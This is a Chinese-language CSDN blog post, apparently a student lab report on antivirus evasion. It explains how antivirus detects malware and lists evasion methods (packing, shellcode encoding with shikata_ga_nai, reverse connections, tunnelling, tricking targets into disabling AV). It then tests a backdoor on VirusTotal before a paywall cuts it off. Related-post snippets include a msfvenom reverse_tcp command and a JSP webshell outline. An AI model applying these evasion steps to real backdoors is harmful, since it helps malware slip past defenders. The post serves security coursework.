20194307肖江宇Exp3—免杀原理与实践

已于 2022-04-09 13:29:31 修改
阅读量4.6k 收藏
点赞数
文章标签: python
于 2022-04-08 17:58:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MYRLY/article/details/123949049
版权
本文探讨了杀软如何检测恶意代码,免杀技术的目的是让后门避开AV软件的检测。免杀方法包括改变特征、行为和内存特征,以及使用加壳工具和编码器。实验中使用msfvenom、veil进行加壳和编码,通过virustotal检测检出率,以展示免杀效果。最后,作者反思了实验收获,强调自主设计免杀技术的重要性。
摘要由CSDN通过智能技术生成

文章目录

20194307肖江宇Exp3-免杀原理与实践

1 基础问题回答

1.1 杀软是如何检测出恶意代码的?

基于特征码进行检测: 杀毒软件的病毒库记录了一些恶意软件的特征码,一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。这些特征码一般由一个不大于64字节的字符串组成,且是只有该病毒内才出现的字符串,根据已检测出或网络上公布的病毒,对其提取特征码,记录在病毒库中,检测到程序时将程序与特征码比对即可判断是否是恶意代码。

**利用启发式恶意软件检测:**将一个软件与恶意软件的行为、代码等作比对,如果发现相似度达到一定程度,即判定这个程序为恶意代码,有一定误报可能,简单来说,就是根据些片面特征去推断。通常是因为缺乏精确判定依据。

**基于行为的恶意软件检测:**对运行的所有进程进行实时监控,如果有敏感行为会被认为是恶意程序,是一种动态的监测与捕捉,一般也是针对特征扫描的而言的,指通用的、多特征的、非精确的扫描,相当于加入了行为监控的启发式。

1.2 免杀是做什么?

免杀就是让安插的后门不被AV软件发现。除了直接使用现有后门软件外,还有一些方式,在实际中也有用。让我们的后门在目标机器上不被杀毒软件或者其他的防护软件识别并删除,悄悄的干活(不悄悄的别人也不让我们进行攻击和窥探)。

1.3 免杀的基本方法有哪些?

(1)改变特征

  • 如果你手里只有EXE
    • 加壳:压缩壳 加密
  • 有shellcode(像Meterpreter)
    • 用encode进行编码
    • 基于payload重新编译生成可执行文件
  • 有源代码
    • 用其他语言进行重写再编译(veil-evasion)

(2)改变行为

  • 通讯方式
    • 尽量使用反弹式连接
    • 使用隧道技术
    • 加密通讯数据
  • 操作模式
    • 基于内存操作
    • 减少对系统的修改
    • 加入混淆作用的正常功能代码

(3)修改内存特征
(4)等价替换法:把特征码所对应的汇编指令命令中替换成功能类拟的指令.
(5)通用跳转法:把特征码移到零区域(指代码的空隙处),然后一个JMP又跳回来执行
(6)非常规方法

  • 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
  • 使用社工类攻击,诱骗目标关闭AV软件。
  • 纯手工打造一个恶意软件

​1.4 开启杀软能绝对防止电脑中恶意代码吗?

说绝对是有些过了,通过virus扫描类的网站我们已经能够看出,不同的后门不同的杀软是表现不同的,所以不能绝对防止!

2 实验环境

免杀测试平台:virustotal

3 实践内容

3.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

检测直接生成的后门exe文件(实验二中的后门程序)

在这里插入图片描述
在virustotal检测20194307_backdoor文件
检出率为53/70

在这里插入图片描述
使用编码
进入以下目录

cd /usr/share/metasploit-framework/modules/encoders/x86

ls查询

在这里插入图片描述
从中选取中意的编码器
这里我选取shikata_ga_nai.

最低0.47元/天 解锁文章
20194307肖江宇
关注
Python3中exp()函数用法分析
09-19
Python3中,`exp()`函数是一个非常重要的数学计算工具,它用于计算自然对数的指数,即e的x次方。e是一个常数,约等于2.71828,代表自然对数的底数。这个函数是Python的`math`模块的一部分,因此在使用`exp()`之前...
20194307肖江宇Exp-4 恶意代码分析
MYRLY的博客
04-11 4443
文章目录2094307肖江宇Exp-4 恶意代码分析一、实践目标1.1 系统运行监控1.2 恶意软件分析1.3 未来设想二、实践内容2.1 系统运行监控—任务计划(1) 写好脚本(实际上就是命令行语句)(2)用命令行创建一个计划任务(3)打开任务计划程序(4)在常规中选择使用最高权限运行,在条件中关闭电源限制(5)在操作栏清空参数,选择批处理文件(6)等待一段时间后就可以得到想要的数据了(7)收集了较多数据后,停止任务,将所得数据在excel中进行分析(8)分析结果 2094307肖江宇Exp-4 恶意代码
20194307肖江宇Exp-8Web综合
MYRLY的博客
05-25 316
《网络对抗技术》Exp8 Web综合 一、实践内容 1.1 实践内容 (1)Web前端HTML 能正常安装、启停Apache。理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML。 (2)Web前端javascipt 理解JavaScript的基本功能,理解DOM。 在(1)的基础上,编写JavaScript验证用户名、密码的规则。在用户点击登陆按钮后回显“欢迎+输入的用户名” 尝试注入攻击:利用回显用户名注入HTML及JavaScript。 (3)Web后端 MySQL基
20194307肖江宇Exp5—信息搜集与漏洞扫描
MYRLY的博客
04-21 304
20194307肖江宇Exp5—信息搜集与漏洞扫描 一、实践目标 掌握信息搜集的最基础技能与常用工具的使用方法 各种搜索技巧的应用 DNS IP注册信息的查询 基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点(以自己主机为目标) 漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞(以自己主机为目标) 二、实践内容 1. 各种搜索技巧的应用 (1) 搜索网址目录结构 msfconsole use auxiliary/scanner/http/dir_scanner set THR
计算机毕业设计(附源码)python智能云税导引服务机器人云端管理
杰记计算机程序源码
11-07 228
在机器人信息管理页面中可以对索引、机器人编号、机器人姓名、欢迎语、状态表情、主控板、电源管理板、摄像头、导航等内容,进行详情、修改或删除等操作;在资源管理页面中可以对索引、账号、机器人编号、服务名称、咨询内容、服务时间、不可到地点、不可导范围、图片等内容,进行详情、修改或删除等操作;在引领带路管理页面中可以对索引、名称、图片、上传时间等内容,进行详情、修改或删除等操作;
云栖社区钉群系列直播精彩回顾:Java、PG、HBase和K8S ...
测试0901-1
01-11 342
为满足开发者交流的需求,云栖社区所运营的多个钉钉大群均已突破2000人,有同学希望可以看到汇总资料,特别整理,欢迎大家分享并邀请朋友进群。 云栖社区2019年1月技术活动:PG, Java,Spark等30+场预告【持续更新】,欢迎进群。 主讲人:徐雷(点击关注专家,掌握一手干货) 阿里云大学讲师,与阿里P9叶翔主讲《阿里巴巴MongoDB高级实战课程》...
id3lib.exp_release_Creating_id3lib_exp_
10-02
C++ library for creating and manipulating id3v1/2 tags.Copyright 2002 2003 Thijmen Klok
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
id3lib.exp_id3lib_Thomas!_exp_binaries_
10-03
This library is free software.C++ library for creating and manipulating id3v1/2 tags.Copyright 1999 2000 Scott Thomas HaugCopyright 2002 2003 Thijmen Klok
20194307肖江宇Exp2—后门原理实践
MYRLY的博客
03-28 3866
文章目录20194307肖江宇Exp-2后门原理实践1.实验基础1.1基础知识1.2常用后门工具NC和NetcatSoCat任何代理、转发等功能都可以用该工具实现。Meterpreter2.实验目标2.1实验环境3.实验过程3.1使用netcat获取主机操作Shell,cron启动**(1)在主机中获取虚拟机shell****(2)在虚拟机中获取主机shell****(3)在虚拟机中cron启动并在主机监听**3.2使用socat获取主机操作Shell,任务计划启动(1)在Windows获得Linux S
20155233 《网络对抗技术》EXP3 免杀原理实践
dayang1122334的博客
04-07 126
正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 使用msf编码器生成jar包 输入命令msfvenom -p java/meterpreter/reverse_tcp lhost=LIinuxIP lport=端口号 x> 文件名.jar 查杀检测:可以看出较exe文件,jar文件的...
webshell之jsp免杀
tomyyyyy
11-26 2637
webshell之jsp免杀 转载自webshell免杀研究 原理 向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作。 结构 实现三步 数据的传递 执行所传递的数据 回显 数据传递 String x = request.getParameter("x"); 执行所传递的数据 Class rt = Class.forN...
python】—— Python爬虫实战:爬取珠海市2011-2023年天气数据并保存为CSV文件
weixin_63106307的博客
09-05 1186
本文将介绍如何使用Python编写一个简单的爬虫程序,以爬取珠海市2011年至2023年的天气数据,并将这些数据保存为CSV文件。
蒙特卡罗方法——布丰投针实验近似计算圆周率python代码实现
最新发布
2301_79376014的博客
09-09 421
蒙特卡罗——布丰实验
pip-tools:打造可重复、可控的 Python 开发环境,解决依赖关系,让代码更稳定
weixin_53707653的博客
09-09 791
是一个强大且易用的工具,可以帮助开发者轻松管理 Python 项目的依赖关系,确保代码的可重复性和稳定性。是一组命令行工具,旨在简化 Python 依赖关系的管理,确保项目环境的稳定性和可重复性。可以确保每次构建环境时都使用相同的依赖项版本,从而避免由于依赖项版本不一致导致的错误,提高代码可重复性和稳定性。自动化了依赖关系管理过程,节省了开发者的时间和精力,可以将更多时间投入到实际的开发工作中。文件中的信息,更新虚拟环境,安装、升级或卸载所需的软件包,确保虚拟环境与。命令可以从你的项目配置文件中生成。
Python实现多线程、多进程及协程
qq_42568323的博客
09-09 1022
本文详细介绍了 Python 中多线程、多进程和协程的并发模型及其实现方式,并通过具体场景演示了如何使用面向对象思想实现这些模型。在实际应用中,应根据任务的类型和需求选择合适的并发模型,从而优化程序的性能和资源利用率。本文将详细介绍 Python 中的多线程、多进程和协程的概念及其实现方式,并通过具体场景展示如何在 Python 中使用面向对象的思想实现这些并发模型。接下来,我们通过一个计算密集型任务的示例来演示多进程的实现:计算一系列大数字的阶乘。主程序中创建并启动了多个计算进程,并使用。
[Python]生成器和yield关键字
weixin_57336987的博客
09-07 401
概述:​ 它指的是 generator, 类似于以前学过的: 列表推导式, 集合推导式, 字典推导式…作用:​ 降低资源消耗, 快速(批量)生成数据.实现方式:​ 1.推导式写法.​ 2.yield写法.yield i # yield会记录每个生成的数据, 然后逐个的放到生成器对象中, 最终返回生成器对象.问题: 如何从生成器对象中获取数据?​ 答案:​ 1.for循环遍历​ 2.next()函数, 逐个获取.
基于人工智能的音乐情感分类系统
stm32d1219的博客
09-06 1268
音乐作为一种强烈的情感表达方式,不同的音调、节奏和和声传递着不同的情感信息。通过人工智能技术,能够自动识别音乐中的情感,为用户提供个性化的音乐推荐或情感分析服务。通过使用MFCC特征提取与神经网络分类算法,音乐情感分类系统可以有效地分析音乐中的情感信息,并根据不同情感对音乐进行分类。随着深度学习技术的进一步发展,音乐情感分类系统的准确性和应用范围将得到进一步提升。音乐情感分类是通过对音乐音频信号进行分析,识别出音乐传递的情感,如“愉快”、“悲伤”、“愤怒”等。问题讨论,人工智能的资料领取可以私信!
Oracle数据库备份与恢复:EXP/IMP操作详解
"Oracle文档操作主要涉及Oracle数据库的数据备份与恢复,通过exp和imp工具进行。这些工具允许管理员执行冷备份和热备份,确保数据的安全性。本文将介绍exp和imp的基本命令、工作方式以及三种操作模式:表方式、用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值